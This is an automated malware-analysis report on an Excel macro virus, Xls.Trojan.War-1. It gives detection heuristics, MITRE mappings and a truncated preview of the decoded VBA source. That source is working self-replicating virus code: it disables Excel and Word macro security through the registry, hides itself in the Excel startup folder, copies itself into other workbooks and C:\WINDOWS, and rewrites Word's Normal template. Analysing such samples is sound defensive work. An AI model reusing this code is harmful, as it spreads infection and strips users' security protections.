MALICIOUS
340
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample is identified as Xls.Trojan.War-1 by ClamAV, indicating malicious intent. It contains VBA macros, including Auto_Open and Auto_Close, which are designed to execute automatically. The script attempts to modify Excel security settings and create directories for persistence, likely to ensure the malware runs on system startup or when Excel is launched. The presence of Auto_Open and Auto_Close macros strongly suggests it's designed to be delivered as a malicious attachment.
Heuristics 7
-
ClamAV: Xls.Trojan.War-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.War-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8852 bytes |
SHA-256: 6b8731e16dc386455be3d5338071fbb6d1b1eca203793b0ad79956bbbb4122ea |
|||
|
Detection
ClamAV:
Xls.Trojan.War-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Email"
'Primeiro Excel Virus Brasileiro Para Excel97 e Excel2000 e Email e MIRC
'AlevirusS>C>S 1999!!
Sub Auto_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = 0
End If
Call Email
Call Estupro
Call Mirc
Call Dia
MkDir "c:\Arquivos de programas\Microsoft Office\Office\XLINICIO"
MkDir "c:\Programs Files\Microsoft Office\Office\XLINICIO"
Application.ScreenUpdating = 0
Application.DisplayAlerts = 0
If Tudo() Then
GoTo SejaGay:
Else
NoOlho
End If
SejaGay:
Application.OnSheetActivate = "ALEVIRUSCS.XLM!Puta"
fui:
End Sub
Function Tudo() As Boolean
Tudo = False
For x = 1 To Application.Workbooks.Count
If Application.Workbooks(x).Name = "ALEVIRUSCS.XLM" Then
For y = 1 To Application.Workbooks("ALEVIRUSCS.XLM").Modules.Count
If Application.Workbooks("ALEVIRUSCS.XLM").Modules(y).Name = "Email" Then
Tudo = True
End If
Next y
End If
Next x
End Function
Function NoOlho()
activebook = ActiveWorkbook.Name
Workbooks(activebook).SaveCopyAs Application.StartupPath + "\ALEVIRUSCS.XLM"
Workbooks.Open (Application.StartupPath + "\ALEVIRUSCS.XLM")
Windows("ALEVIRUSCS.XLM").Visible = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
End Function
Function Amerda() As Boolean
activebook = ActiveWorkbook.Name
Amerda = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
If Application.Workbooks(activebook).Modules(y).Name = "Email" Then
Amerda = True
End If
Next y
End Function
Sub Puta()
oactivebook = ActiveWorkbook.Name
If Amerda() Then
GoTo cya
Else
End If
Application.ScreenUpdating = False
Application.Windows("ALEVIRUSCS.XLM").Visible = True
Workbooks("ALEVIRUSCS.XLM").Activate
Sheets("Email").Visible = True
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Copy Before:=Workbooks(oactivebook).Sheets(1)
Workbooks(oactivebook).Sheets("Email").Visible = False
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Visible = False
Windows("ALEVIRUSCS.XLM").Visible = False
cya:
Close
End Sub
Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\WAR3.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\SEXO.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\FONE.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\AVP.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\CAIXA.XLS"
Call Dia
End Sub
Private Sub Estupro()
On Error Resume Next
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
If InStr(1, NT.Lines(1, 1), "'AlevirusSCS<>EMAIL<>Excel<>Virus<>BRASIL<>1999!") Then
WordObj.Run "Normal.ThisDocument.AutoExec"
Else
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Sub AutoExec()"
NT.InsertLines 2, "On Error Resume Next"
NT.InsertLines 3, "Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)"
NT.InsertLines 4, "System.ProfileString(""Options"", ""EnableMacroVirusProtection"") = ""0"""
NT.InsertLines 5, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 6, "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 7, "End Sub"
WordObj.Run "Normal.ThisDocument.AutoExec"
End If
Set NT = Nothing
If Quit = True Then WordObj.Quit
End Sub
Private Sub
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.